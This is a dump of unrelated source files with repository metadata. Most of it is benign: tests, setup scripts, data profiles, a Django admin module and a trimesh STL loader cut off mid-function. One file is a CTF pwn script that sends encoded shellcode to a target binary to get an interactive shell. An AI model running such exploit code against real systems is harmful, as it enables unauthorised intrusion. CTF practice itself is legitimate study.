edc66e399f6066effc5aaa376883e88e06b5332b
|
1a51834bedffd4472e344bed28f4d766614b1537
|
refs/heads/master
| 2023-08-30T23:17:56.017934
| 2023-08-30T05:42:00
| 2023-08-30T05:42:00
| 26,165,004
| 30
| 31
|
BSD-2-Clause
| 2023-09-14T06:40:13
| 2014-11-04T10:56:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 524
|
py
|
import pytest
@pytest.mark.base
def test_A():
    """Smoke test: tutorial step 1A (spatial problem setup) runs without error."""
    from pySDC.tutorial.step_1.A_spatial_problem_setup import main as main_A
    main_A()
@pytest.mark.base
def test_B():
    """Smoke test: tutorial step 1B (spatial accuracy check) runs without error."""
    from pySDC.tutorial.step_1.B_spatial_accuracy_check import main as main_B
    main_B()
@pytest.mark.base
def test_C():
    """Smoke test: tutorial step 1C (collocation problem setup) runs without error."""
    from pySDC.tutorial.step_1.C_collocation_problem_setup import main as main_C
    main_C()
@pytest.mark.base
def test_D():
    """Smoke test: tutorial step 1D (collocation accuracy check) runs without error."""
    from pySDC.tutorial.step_1.D_collocation_accuracy_check import main as main_D
    main_D()
|
[
"r.speck@fz-juelich.de"
] |
r.speck@fz-juelich.de
|
43019e739fd97a9d55793a78ce5e2ae210eff614
|
8876406eaef11bff8566b54746ca2a7fae3525db
|
/setup.py
|
4c3c25f64e6ea9d2e13bd8210b73d610353940d2
|
[
"BSD-3-Clause"
] |
permissive
|
remibergsma/cs
|
19e0ba4b9ea5c97329e743577d1c8cb10aa593d2
|
de004f6aa08ee8fc0dc342b334a2731b8c5be964
|
refs/heads/master
| 2020-12-28T20:30:43.209507
| 2015-06-03T08:40:13
| 2015-06-03T08:40:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
# coding: utf-8
from setuptools import setup
with open('README.rst', 'r') as f:
long_description = f.read()
setup(
name='cs',
version='0.6.8',
url='https://github.com/exoscale/cs',
license='BSD',
author=u'Bruno Renié',
description=('A simple yet powerful CloudStack API client for '
'Python and the command-line.'),
long_description=long_description,
py_modules=('cs',),
zip_safe=False,
include_package_data=True,
platforms='any',
classifiers=(
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
),
install_requires=(
'requests',
),
extras_require={
'highlight': ['pygments'],
},
test_suite='tests',
entry_points={
'console_scripts': [
'cs = cs:main',
],
},
)
|
[
"brutasse@gmail.com"
] |
brutasse@gmail.com
|
8059df45728dd522b8eaf9bfac6c0b962d0f7839
|
0667af1539008f9c6c0dcde2d3f50e8bbccf97f3
|
/source/rttov_test/profile-datasets-py/standard54lev_nogas/006.py
|
29fa4a49fa333f38babeedbd3040338a5c6cfdcf
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bucricket/projectMAScorrection
|
bc6b90f07c34bf3e922225b2c7bd680955f901ed
|
89489026c8e247ec7c364e537798e766331fe569
|
refs/heads/master
| 2021-01-22T03:54:21.557485
| 2019-03-10T01:47:32
| 2019-03-10T01:47:32
| 81,468,938
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,904
|
py
|
"""
Profile ../profile-datasets-py/standard54lev_nogas/006.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/standard54lev_nogas/006.py"
self["Q"] = numpy.array([ 1.42610400e+00, 2.25740200e+00, 3.03034000e+00,
3.69967200e+00, 4.31610400e+00, 4.78132800e+00,
5.07478900e+00, 5.19176800e+00, 5.24924200e+00,
5.19879300e+00, 5.07691300e+00, 4.97253200e+00,
4.91453000e+00, 4.85289800e+00, 4.77784900e+00,
4.68692800e+00, 4.57725700e+00, 4.47492000e+00,
4.32859300e+00, 4.16293300e+00, 4.00311700e+00,
3.89910100e+00, 3.84313200e+00, 3.83660900e+00,
3.90954900e+00, 4.65101500e+00, 5.63378900e+00,
9.11755200e+00, 1.54746500e+01, 2.64265500e+01,
4.48840100e+01, 7.45942600e+01, 1.42818600e+02,
2.77400700e+02, 4.26100500e+02, 5.67428700e+02,
8.00060400e+02, 1.05809300e+03, 1.34364000e+03,
1.75293000e+03, 2.17224400e+03, 2.70441300e+03,
3.21086700e+03, 3.87373300e+03, 4.48421200e+03,
5.05073700e+03, 5.56837500e+03, 6.03632700e+03,
6.53543000e+03, 6.97678600e+03, 7.36122200e+03,
7.68945200e+03, 7.96208200e+03, 8.17961100e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.31000000e-02, 3.04000000e-02,
6.44000000e-02, 1.26300000e-01, 2.32400000e-01,
4.05200000e-01, 6.74900000e-01, 1.08010000e+00,
1.66910000e+00, 2.50110000e+00, 3.64620000e+00,
5.18640000e+00, 7.21500000e+00, 9.83680000e+00,
1.31672000e+01, 1.73308000e+01, 2.24601000e+01,
2.86937000e+01, 3.61735000e+01, 4.50430000e+01,
5.54433000e+01, 6.75109000e+01, 8.13744000e+01,
9.71505000e+01, 1.14941500e+02, 1.34831800e+02,
1.56884600e+02, 1.81139400e+02, 2.07609200e+02,
2.36278400e+02, 2.67101200e+02, 3.00000000e+02,
3.34864800e+02, 3.71552900e+02, 4.09889300e+02,
4.49667700e+02, 4.90651600e+02, 5.32576900e+02,
5.75153800e+02, 6.18070600e+02, 6.60996500e+02,
7.03586300e+02, 7.45484100e+02, 7.86327800e+02,
8.25754600e+02, 8.63404700e+02, 8.98927500e+02,
9.31985300e+02, 9.62258700e+02, 9.89451000e+02,
1.01329200e+03, 1.03354400e+03, 1.05000000e+03])
self["T"] = numpy.array([ 190.1948, 201.2227, 211.8073, 223.5081, 236.1925, 248.2361,
259.807 , 268.0701, 270.6029, 261.7915, 253.267 , 245.5053,
238.5085, 232.1688, 228.139 , 225.8658, 224.038 , 222.399 ,
220.8289, 219.3256, 217.9126, 216.7 , 216.7 , 216.7 ,
216.7 , 216.7 , 216.7 , 216.7 , 216.7 , 216.7432,
218.4824, 223.6361, 228.5799, 233.4172, 238.0864, 242.5655,
246.9064, 251.0443, 254.9895, 258.7664, 262.3204, 265.715 ,
268.8759, 271.8706, 274.6321, 277.2104, 279.572 , 281.7077,
283.6703, 285.4074, 286.9218, 288.2157, 289.291 , 290.1495])
self["CTP"] = 500.0
self["CFRACTION"] = 1.0
self["IDG"] = 4
self["ISH"] = 4
self["ELEVATION"] = 0.2
self["S2M"]["T"] = 288.2
self["S2M"]["Q"] = 7488.49927299
self["S2M"]["O"] = 0.0164756909121
self["S2M"]["P"] = 1100.0
self["S2M"]["U"] = -6.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 200000.0
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 286.2
self["SKIN"]["SALINITY"] = 37.0
self["SKIN"]["FOAM_FRACTION"] = 0.9
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 60.0
self["AZANGLE"] = 45.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -45.0
self["GAS_UNITS"] = 2
self["BE"] = 0.7
self["COSBK"] = 1.0
self["DATE"] = numpy.array([1976, 7, 1])
self["TIME"] = numpy.array([ 9, 45, 0])
|
[
"bucricket@gmail.com"
] |
bucricket@gmail.com
|
14fb6d53004b22663463f0d74039ca56e3a85c52
|
8bd6b0784de9a1e6a39d0f5f23f2d8fb50c73d49
|
/MethodRefine-Rand/logistics/MethodRefine/logistics_benchmark-low/testing/testing_39.py
|
11af675b7493eb76367a40c8454e27bc462ca562
|
[] |
no_license
|
sysulic/MethodRefine
|
a483d74e65337dff4bc2539ce3caa3bf83748b48
|
adbb22d4663041d853d3132f75032b7561bf605c
|
refs/heads/master
| 2020-09-14T10:45:55.948174
| 2020-05-01T09:13:59
| 2020-05-01T09:13:59
| 223,104,986
| 3
| 2
| null | 2020-04-27T11:01:36
| 2019-11-21T06:33:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,654
|
py
|
#!/usr/bin/env python
# coding=utf-8
import sys
sys.path.insert(0, './')
from logistic import *
import new_tihtn_planner
state0 = new_tihtn_planner.State('state0')
allow = False
state0.loc = {'truck1':('city1','loc1'),'truck2':('city2','loc1'),'truck3':('city3','loc1'),'truck4':('city4','loc1'),'truck5':('city5','loc2'),'plane1':('city4','loc1'),'pkg1':('city1','loc1'),'pkg2':('city2','loc2'),'pkg3':('city1','loc1'),'pkg4':('city2','loc2'),}
state0.load = {'truck1':False,'truck2':False,'truck3':False,'truck4':False,'truck5':False,'plane1':False,}
state0.plane_nums = 1
new_tihtn_planner.declare_types({'location':[('city1','loc1'),('city1','loc2'),('city2','loc1'),('city2','loc2'),('city3','loc1'),('city3','loc2'),('city4','loc1'),('city4','loc2'),('city5','loc1'),('city5','loc2'),],'truck':['truck1','truck2','truck3','truck4','truck5',],'plane':['plane1',],'pkg':['pkg1','pkg2','pkg3','pkg4',]})
new_tihtn_planner.declare_funs({load_plane:['pkg', 'location', 'plane'],load_truck:['pkg', 'location', 'truck'],by_plane:['plane', 'location'],drive_truck:['truck', 'location'], unload_truck:['pkg', 'location', 'truck'],unload_plane:['pkg', 'location', 'plane']})
new_tihtn_planner.instance()
def execute(completable):
    """Run the TIHTN planner on the fixed logistics instance defined above.

    The goal is four 'delievery' tasks (spelling as used by the planner),
    partially ordered by the [[0,1],[1,2],[2,3]] constraints, depth bound 9.
    """
    return new_tihtn_planner.pyhop(completable, allow, state0,[('delievery','pkg1',('city4','loc2')),('delievery','pkg2',('city4','loc2')),('delievery','pkg3',('city4','loc1')),('delievery','pkg4',('city4','loc2')),],[[0, 1],[1, 2],[2, 3],], 9)
def add_methods(fun_obj_list):
    """Register each function under its base name (text before '__').

    Note: uses func_name, so this file targets Python 2.
    """
    for fun in fun_obj_list:
        new_tihtn_planner.add_method(fun.func_name.split('__')[0], fun)
def reverse_methods():
    """Reverse the planner's stored method ordering."""
    new_tihtn_planner.reverse_methods()
|
[
"526552330@qq.com"
] |
526552330@qq.com
|
a196daf132349155bf416fdc4b57e570c83a009f
|
7f5ca987c51ffd49b3cba3ffa3e719fc2b8606aa
|
/classtest1.py
|
1160fea16133893b6bfb38a6943c5b03ddd0e5dc
|
[] |
no_license
|
Yao-Phoenix/TrainCode
|
1134b995fddb3d3556fdce05c3219a875b08f6d3
|
2227a70ad5389207af7a84114a5413be3ec2ada2
|
refs/heads/master
| 2020-09-13T03:56:02.235742
| 2019-12-17T03:48:00
| 2019-12-17T03:48:00
| 222,648,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
class UserData:
    """Minimal user record: a public id and a name kept in _name."""

    def __init__(self, id, name):
        self.id = id
        self._name = name


class NewUser(UserData):
    """UserData variant that exposes the name through a validating property."""

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, value):
        # Names of three characters or fewer are rejected: the old value is
        # kept and a diagnostic is printed (original behavior preserved).
        if len(value) > 3:
            self._name = value
        else:
            print("ERROR")
if __name__ == '__main__':
user1 = NewUser(101, 'Jack')
user1.name = 'Lou'
user1.name = 'Jackie'
user2 = NewUser(102, 'Louplus')
print(user1.name)
print(user2.name)
|
[
"493867456@qq.com"
] |
493867456@qq.com
|
e72c98c5a54cc288211b129dfa01220fda615b8c
|
2e935ca936976d2d2bd4e785e2f3f29c63771542
|
/ExPy11205.py
|
fba7158c4dd56aa10949bc9293c983dc7ae0a0a6
|
[] |
no_license
|
zoro6908/PY_acamedy
|
4a370e866fef19f6d2e7697eb809352b6ac703f5
|
460d26639f7bd8cf2486950dc70feae6a2959ca0
|
refs/heads/master
| 2023-04-26T18:10:44.691326
| 2021-05-25T00:11:02
| 2021-05-25T00:11:02
| 298,425,369
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 796
|
py
|
# Python from Basics to Applications (2020.09)
# [Lesson 12] Working with Excel
# Alignment / font / borders: uses the Alignment, Font, Border and Side
# classes from the openpyxl.styles module.
import openpyxl
# from openpyxl.styles import Alignment, Font, Border, Side
from openpyxl.styles import *
wb = openpyxl.Workbook()
ws = wb.active
ws['B3'] = 'Hello'
# Bold italic underlined 20pt text in the 'HY헤드라인M' (HY HeadLine M) font.
ws['B3'].font = Font(name = 'HY헤드라인M',
                     bold = True,
                     size = 20,
                     italic=True,
                     underline='single')
# Center the cell contents both horizontally and vertically.
ws['B3'].alignment = Alignment(horizontal='center',
                               vertical='center')
# Thin top/bottom edges, double left/right edges.
th = Side(border_style='thin')
db = Side(border_style='double')
ws['B3'].border = Border(top=th, bottom=th, left=db, right=db)
wb.save('ExPy11205.xlsx')
|
[
"zoro6908@naver.com"
] |
zoro6908@naver.com
|
cfe2b636fcb88772b97e8c84b97d910528fa961f
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/keras/engine/training_v1.py
|
ed875cfba01676d954377d3288f63abbfad0c678
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755
| 2021-07-05T14:09:15
| 2021-07-05T14:09:15
| 382,864,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:1eee4b42243c8bc161538de91452850d0486f84aae8e4c4cc9987a3c09eb1557
size 137398
|
[
"business030301@gmail.com"
] |
business030301@gmail.com
|
16d42264f14e0df27c1fd16e5ca5faa78c9249da
|
f504fc2714ed09c3bc1e84dfe67c04af585b8700
|
/Player.py
|
69028cc93fd718f9f797d04ae68fa470de7516b0
|
[] |
no_license
|
MasumTech/OOP-Concept-in-Python
|
04c88a28c2c8bf7ed0231c0da223f216177a07f9
|
7a0a9e214003c759a84e2e28bf8b4702b2e3ced8
|
refs/heads/master
| 2020-12-15T16:06:36.909927
| 2020-01-20T19:04:19
| 2020-01-20T19:04:19
| 235,169,330
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
class Player:
    """A player with a name, an age, and class-wide age limits."""

    # Permitted age range, shared by all players.
    minAge = 18
    maxAge = 50

    def __init__(self, name, age):
        self.name = name
        self.age = age
|
[
"masumrezadiu@gmail.com"
] |
masumrezadiu@gmail.com
|
70617f3d7d699cb8fa1781509963bc430072ca0c
|
b3217e2bb6e72fbcb15df99b5c6c10ea4731a5b7
|
/anheng/2020NewYear/pwn/unctf_EasyShellcode/pwn1.py
|
331c88293dc6c22ceb2553d7c395ca0eef05c56f
|
[] |
no_license
|
CrackerCat/ctf-6
|
5704de09eda187e111c7719c71e0a81c5d5c39e3
|
aa7846548451572fe54a380dc8d367a0132ad2ec
|
refs/heads/master
| 2023-01-28T06:18:01.764650
| 2020-12-07T12:05:20
| 2020-12-07T12:05:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,641
|
py
|
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
local_file = './pwn1'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host, port)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
if is_local: gdb.attach(p,cmd)
ru('What do you want to say?\n')
# generated by aplha3
shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
debug('b *0x400ca3')
sl(shellcode)
# debug()
# info_addr('tag',addr)
# log.warning('--------------')
p.interactive()
|
[
"742954809@qq.com"
] |
742954809@qq.com
|
2523fb189b949d3b82eaec95c265a2e1f0967c70
|
48faee5b845e43e6c102cb027f43c8b886ecaa5e
|
/accounts/admin.py
|
70ffd71bf72808920c9ff285ffcdb97d3c0f9675
|
[] |
no_license
|
hornLK/LonedayAdmin
|
66c0a8b978967a0144a216f621c872a6d2197229
|
36ba3fe763788423801ad5ab14462624114da804
|
refs/heads/master
| 2022-12-26T06:57:47.675915
| 2018-05-15T13:08:34
| 2018-05-15T13:08:34
| 131,375,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
from django.contrib import admin
from django import forms
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from accounts.models import UserInfo,Permission,Role
class UserCreationForm(forms.ModelForm):
    """Admin form for creating a user with a password + confirmation."""
    password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
    password2 = forms.CharField(label='Password confirmation', widget=forms.PasswordInput)

    class Meta:
        model = UserInfo
        fields = ('email', 'nickname')

    def clean_password2(self):
        # BUG FIX: Django only invokes validation hooks named
        # clean_<fieldname>; the original method was clean_Password2
        # (capital P), so the mismatch check never ran.
        password1 = self.cleaned_data.get("password1", None)
        password2 = self.cleaned_data.get("password2", None)
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError("密码不匹配")
        return password2

    def save(self, commit=True):
        """Hash the raw password before persisting the new user."""
        user = super().save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user
class UserChangeForm(forms.ModelForm):
    """Admin form for editing an existing user.

    The password is displayed via ReadOnlyPasswordHashField and is never
    changed here: clean_password always returns the stored initial hash.
    """
    password = ReadOnlyPasswordHashField()
    class Meta:
        model = UserInfo
        fields = ('email','nickname','role','is_active','is_superuser')
    def clean_password(self):
        # Whatever is submitted, keep the original hashed password.
        return self.initial["password"]
class UserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('email','nickname','role','is_active','is_superuser')
list_filter = ('is_superuser','is_active','role')
fieldsets = (
('基础',{'fields':('email','nickname')}),
('权限',{'fields':('role','is_superuser')}),
('状态',{'fields':('is_active',)})
)
add_fieldsets = (
(None,{
'classes':('wide',),
'fields':('email','nickname','password1','password2','role','is_active','is_superuser')
}
),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
# Register your models here.
admin.site.register(UserInfo,UserAdmin)
admin.site.register(Role)
admin.site.register(Permission)
admin.site.unregister(Group)
|
[
"bjlkq546449541@gmail.com"
] |
bjlkq546449541@gmail.com
|
dd095298a9afc68335157cb824950644c08ba41d
|
aee144770c8f4ec5987777aebe5b064e558fc474
|
/doc/integrations/pytorch/parlai/tasks/squad2/build.py
|
094ee646331483740208e88da52a11b78a65a498
|
[
"CC-BY-SA-3.0",
"MIT",
"Apache-2.0",
"AGPL-3.0-only"
] |
permissive
|
adgang/cortx
|
1d8e6314643baae0e6ee93d4136013840ead9f3b
|
a73e1476833fa3b281124d2cb9231ee0ca89278d
|
refs/heads/main
| 2023-04-22T04:54:43.836690
| 2021-05-11T00:39:34
| 2021-05-11T00:39:34
| 361,394,462
| 1
| 0
|
Apache-2.0
| 2021-04-25T10:12:59
| 2021-04-25T10:12:59
| null |
UTF-8
|
Python
| false
| false
| 1,480
|
py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Download and build the data if it does not exist.
import parlai.core.build_data as build_data
import os
from parlai.core.build_data import DownloadableFile
RESOURCES = [
DownloadableFile(
'https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v2.0.json',
'train-v2.0.json',
'68dcfbb971bd3e96d5b46c7177b16c1a4e7d4bdef19fb204502738552dede002',
zipped=False,
),
DownloadableFile(
'https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v2.0.json',
'dev-v2.0.json',
'80a5225e94905956a6446d296ca1093975c4d3b3260f1d6c8f68bc2ab77182d8',
zipped=False,
),
]
def build(opt):
dpath = os.path.join(opt['datapath'], 'SQuAD2')
version = None
if not build_data.built(dpath, version_string=version):
print('[building data: ' + dpath + ']')
if build_data.built(dpath):
# An older version exists, so remove these outdated files.
build_data.remove_dir(dpath)
build_data.make_dir(dpath)
# Download the data.
for downloadable_file in RESOURCES:
downloadable_file.download_file(dpath)
# Mark the data as built.
build_data.mark_done(dpath, version_string=version)
|
[
"noreply@github.com"
] |
adgang.noreply@github.com
|
5c38ea20e9d5d8f3e31e5d4bd17e1440db4f3d73
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/contrib/keras/api/keras/metrics/__init__.py
|
6e02c1674ee83334cbe7062ab4c5e87eda1d47c4
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:0a12f3b7372d5432f0d79f402b4769a59e1d06dc405da5210bbf689cb36fa0e2
size 2230
|
[
"github@cuba12345"
] |
github@cuba12345
|
67ccb1475ec05c04027a13cfadd67b4b28e9004e
|
cb8d1db4af4401b019775132fe92f3eae4cb92df
|
/_unittests/ut_cli/test_cli_file_helper.py
|
b24c031f8bd1ec2a412e0fabd6edd470918e6747
|
[
"MIT"
] |
permissive
|
Pandinosaurus/pyquickhelper
|
041d6c6d2832845bd89027ffaab333239efc3959
|
860ec5b9a53bae4fc616076c0b52dbe2a1153d30
|
refs/heads/master
| 2023-07-24T12:27:25.700277
| 2023-07-17T07:02:34
| 2023-07-17T07:02:34
| 169,426,142
| 0
| 0
|
MIT
| 2023-07-17T07:53:04
| 2019-02-06T15:17:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
"""
@brief test tree node (time=7s)
"""
import sys
import os
import unittest
from io import StringIO
from pyquickhelper.loghelper import fLOG, BufferedPrint
from pyquickhelper.pycode import get_temp_folder
from pyquickhelper.__main__ import main
class TestCliFileHelper(unittest.TestCase):
def test_cli_file_helper(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p",
".*[.]py", "-r", "f"], fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p", ".*[.]py", "-r",
"f", '-n', 'pycache', '-fu', '1'],
fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
self.assertNotIn("pycache", res)
this = os.path.abspath(os.path.dirname(__file__))
st = BufferedPrint()
main(args=["ls", "-f", this, "-p", ".*[.]py", "-r",
"f", '-n', 'pycache', '-fu', '1', '-s', "test_(.*)",
'-su', 'unit_\\1'],
fLOG=st.fprint)
res = str(st)
self.assertIn(".py", res)
self.assertNotIn("pycache", res)
self.assertNotIn("test_parser", res)
self.assertIn("unit_parser", res)
if __name__ == "__main__":
unittest.main()
|
[
"xavier.dupre@gmail.com"
] |
xavier.dupre@gmail.com
|
51142e7b8d3e124bfee304c104a86f3a4b396682
|
f8ffa8ff257266df3de9d20d95b291e393f88434
|
/Python from scratch/Warsztaty/Warsztaty01/zad01.py
|
33e1c3878f88c9c49cec628e9e7d3339b1b0c28c
|
[] |
no_license
|
janiszewskibartlomiej/Python_Code_Me_Gda
|
c0583c068ef08b6130398ddf93c3a3d1a843b487
|
7568de2a9acf80bab1429bb55bafd89daad9b729
|
refs/heads/master
| 2020-03-30T05:06:26.757033
| 2020-03-02T08:53:28
| 2020-03-02T08:53:28
| 150,781,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
ekwipunek = {'pieniądze':158.40,
'sprzęt':['kompas', 'latarka', 'śpiwór'],
'prowiant':['jabłko', 'woda', 'batonik', 'batonik']}
print('Lista ekwipunku to: ', ekwipunek)
print('Harcesz kupił karimatę za 29.99 zł')
ekwipunek['pieniądze'] = ekwipunek['pieniądze'] - 29.99
ekwipunek['sprzęt'].append('karimata')
print(ekwipunek)
print('Harcerz zjadł batonik')
ekwipunek['prowiant'].remove('batonik')
print(ekwipunek['prowiant'])
print('Harcerz ma 7 przedmiotów w plecaku: ', ekwipunek['sprzęt'] + ekwipunek['prowiant'])
|
[
"janiszewski.bartlomiej@gmail.com"
] |
janiszewski.bartlomiej@gmail.com
|
1c6026e1dbb38669cf355d1ec7f80ae280b72c1f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_wagering.py
|
3ad88745da9973ac13e723d2d10defa24d8be66f
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
from xai.brain.wordbase.nouns._wager import _WAGER
#calss header
class _WAGERING(_WAGER, ):
def __init__(self,):
_WAGER.__init__(self)
self.name = "WAGERING"
self.specie = 'nouns'
self.basic = "wager"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
db604c59ed67ae9680c1fe9108853daaf57af74b
|
3d5958a79c02fe885324956bfead037999c73c7a
|
/trimesh/io/stl.py
|
32912d8f687bcee9809cc8e06c6380fe138bfba6
|
[
"MIT"
] |
permissive
|
Mambix/trimesh
|
def56d14994076cfcc24e3c3d67d5e27bea5bb49
|
99d01909a1f4cf56d777a8339a6c2443cf37d6b8
|
refs/heads/master
| 2020-05-27T21:20:11.800221
| 2017-03-02T00:57:53
| 2017-03-02T00:57:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,643
|
py
|
import numpy as np
# the exception raised if an STL file object doesn't match its header
class HeaderError(Exception):
pass
# define a numpy datatype for the data section of a binary STL file
_stl_dtype = np.dtype([('normals', np.float32, (3)),
('vertices', np.float32, (3, 3)),
('attributes', np.uint16)])
# define a numpy datatype for the header of a binary STL file
_stl_dtype_header = np.dtype([('header', np.void, 80),
('face_count', np.int32)])
def load_stl(file_obj, file_type=None):
'''
Load an STL file from a file object.
Arguments
----------
file_obj: open file- like object
file_type: not used
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
# save start of file obj
file_pos = file_obj.tell()
try:
# check the file for a header which matches the file length
# if that is true, it is almost certainly a binary STL file
# if the header doesn't match the file length a HeaderError will be
# raised
return load_stl_binary(file_obj)
except HeaderError:
# move the file back to where it was initially
file_obj.seek(file_pos)
# try to load the file as an ASCII STL
# if the header doesn't match the file length a HeaderError will be
# raised
return load_stl_ascii(file_obj)
def load_stl_binary(file_obj):
'''
Load a binary STL file from a file object.
Arguments
----------
file_obj: open file- like object
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
header = np.fromstring(file_obj.read(84), dtype=_stl_dtype_header)
# now we check the length from the header versus the length of the file
# data_start should always be position 84, but hard coding that felt ugly
data_start = file_obj.tell()
# this seeks to the end of the file
# position 0, relative to the end of the file 'whence=2'
file_obj.seek(0, 2)
# we save the location of the end of the file and seek back to where we
# started from
data_end = file_obj.tell()
file_obj.seek(data_start)
# the binary format has a rigidly defined structure, and if the length
# of the file doesn't match the header, the loaded version is almost
# certainly going to be garbage.
data_ok = (
data_end - data_start) == (header['face_count'] * _stl_dtype.itemsize)
# this check is to see if this really is a binary STL file.
# if we don't do this and try to load a file that isn't structured properly
# we will be producing garbage or crashing hard
# so it's much better to raise an exception here.
if not data_ok:
raise HeaderError('Binary STL has incorrect length in header!')
# all of our vertices will be loaded in order due to the STL format,
# so faces are just sequential indices reshaped.
faces = np.arange(header['face_count'] * 3).reshape((-1, 3))
blob = np.fromstring(file_obj.read(), dtype=_stl_dtype)
result = {'vertices': blob['vertices'].reshape((-1, 3)),
'face_normals': blob['normals'].reshape((-1, 3)),
'faces': faces}
return result
def load_stl_ascii(file_obj):
'''
Load an ASCII STL file from a file object.
Arguments
----------
file_obj: open file- like object
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
header = file_obj.readline()
text = file_obj.read()
if hasattr(text, 'decode'):
